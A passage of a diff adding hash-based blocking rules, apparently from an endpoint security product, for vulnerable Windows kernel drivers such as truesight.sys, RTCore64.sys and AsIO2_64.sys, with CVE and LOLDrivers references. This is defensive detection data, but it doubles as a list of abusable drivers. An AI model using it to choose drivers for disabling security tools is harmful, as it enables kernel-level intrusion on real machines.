+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d2a94f44-76dd-5f03-9a4d-aaa73cb1f5a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835807Z",
+ "creation_date": "2026-03-23T11:45:30.835809Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835814Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d3e4b057da5d3e93d142cee093c78e6f59e0b1fbc85a4dc32af7d53c998945f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d2aca4c7-4823-5544-a052-8eb8221c7b87",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.496036Z",
+ "creation_date": "2026-03-23T11:45:31.496039Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.496045Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2fc41b0d0bbd4e623dcc2f0435392126f3fa0f36b68708d63cbf7e0ef4b2e4d7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d2b0b9b1-5432-5bcd-a67a-c9bfd8b63486",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620883Z",
+ "creation_date": "2026-03-23T11:45:29.620885Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620890Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d453110c9050320419c2064ddea08230de6c76f86b07dc58112208e3d24a809e",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d2b4db88-547c-590a-9229-52eff1c2577b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153471Z",
+ "creation_date": "2026-03-23T11:45:31.153473Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153478Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "74d3f294eccc335ec98050f305f49bb6465568c964ba1665047665b2661a7565",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d2bcf3bb-3e1f-56bb-8541-01cf265309ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611677Z",
+ "creation_date": "2026-03-23T11:45:29.611679Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611684Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd7754a6ec6bf19724fb266ec4f1d02607e9b310791d8725d7db5ac84d5430e2",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d2bd5269-d37b-5526-aa34-782af4260050",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477230Z",
+ "creation_date": "2026-03-23T11:45:30.477233Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477242Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d80714d87529bb0bc7abcc12d768c43a697fbca59741c38fa0b46900da4db30e",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d2c0d129-4373-5ad4-b06e-d59c34924505",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615398Z",
+ "creation_date": "2026-03-23T11:45:29.615400Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615407Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9d734d6443a707d601d76577692dc613b35201518856d0189b037f7a4fbd420d",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d2c5bb23-c541-5702-aecf-e2f17e620e69",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460737Z",
+ "creation_date": "2026-03-23T11:45:30.460740Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460749Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0aca4447ee54d635f76b941f6100b829dc8b2e0df27bdf584acb90f15f12fbda",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d2d7f25a-7773-521a-8533-602d8b820b19",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826710Z",
+ "creation_date": "2026-03-23T11:45:31.826713Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826718Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d8b79681480130e33478c8a922ab98b35d3f9b4f2f1fd15d3047448014193098",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d2e29b3a-5e8a-5e38-b37a-c4713e596759",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817592Z",
+ "creation_date": "2026-03-23T11:45:30.817593Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817599Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a6c11d3bec2a94c40933ec1d3604cfe87617ba828b14f4cded6cfe85656debc0",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d2f0926f-f8b0-5098-85fb-5385fbd3f2f5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487451Z",
+ "creation_date": "2026-03-23T11:45:31.487453Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487459Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "515c61e521dce56afd4814e8c6810dc9b325fe4c4c1ff90ecf2434bf2869e816",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d2f53f1e-43ab-522d-8216-bbd553a6c4c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824184Z",
+ "creation_date": "2026-03-23T11:45:30.824187Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824192Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ce6636dd6b217d50a39eeaf3dcdcaf0643aeb1caacb4353f60e208e6e7d1ab11",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d2fd906e-e1bd-5045-945c-a9bf508b818d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823034Z",
+ "creation_date": "2026-03-23T11:45:31.823037Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823046Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e11a326b6f516502e5dd37c4a1867ed6f47f2f008e1e562f26c4a09af2466297",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d3091249-23e5-54e2-9211-9e24d22d0dfa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153907Z",
+ "creation_date": "2026-03-23T11:45:31.153909Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153914Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5ee3f6dc6ce25126481c4ab68f01344a8c8c7f68d0fabc61a9c02a82c2f91e3a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d30913ba-c66d-5525-b61a-a8f02ee87f4c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829554Z",
+ "creation_date": "2026-03-23T11:45:30.829556Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829562Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "877fffa31cfbcb74d20d770abac91a76c686b1d315326eb14285bc6c92366cbe",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d313e4c7-4189-5d51-b8bb-a2ce072f81d8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980768Z",
+ "creation_date": "2026-03-23T11:45:29.980770Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980775Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "06508aacb4ed0a1398a2b0da5fa2dbf7da435b56da76fd83c759a50a51c75caf",
+ "comment": "Vulnerable Kernel Driver (aka PanMonFltX64.sys) [https://www.loldrivers.io/drivers/40bfb01b-d251-4c2c-952e-052a89a76f5b/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d32ff0d2-ca03-5c34-aa67-079960f93ed5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477611Z",
+ "creation_date": "2026-03-23T11:45:31.477615Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477625Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2414ad09451dae4811952d9696de5e37658091dc0363bc96cf0985ff19e9d97a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d338006c-56ad-5d48-bb8f-f2080ceea0f5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621124Z",
+ "creation_date": "2026-03-23T11:45:29.621126Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621131Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7a20ca8f9361eb892257b3693095ffeee61457dc4e22d9b119e3a9f3a1507069",
+ "comment": "CoreTemp Physmem dangerous drivers (aka ALSYSIO64.sys) [https://www.loldrivers.io/drivers/4d365dd0-34c3-492e-a2bd-c16266796ae5/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d33e4e78-526a-5941-a46c-53471b051b37",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485644Z",
+ "creation_date": "2026-03-23T11:45:31.485647Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485657Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "71ec6fc98c2a2c577e13745f0ef4637d780af82fa569985eb584774669a20cda",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d33f9717-2c0c-5308-9b71-ba6da332678d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155523Z",
+ "creation_date": "2026-03-23T11:45:31.155525Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155531Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eddd681692bb34b3025fefe4880792c5358bd41c61c89c6aba47ca110526e9a4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d342b358-667c-5b9a-b72d-a0b59cd4753a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831766Z",
+ "creation_date": "2026-03-23T11:45:30.831768Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831774Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c3f7b3e020495d9742a9211d64adb93b2950bdd6748c101208f446cbd872e5b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d3503940-6000-529f-8a0b-1df34e5d34c3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621811Z",
+ "creation_date": "2026-03-23T11:45:29.621813Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621819Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b1af050481bda270a08ae873224a142c8b2119eeda59d3a04b1f6d66715a8c8",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
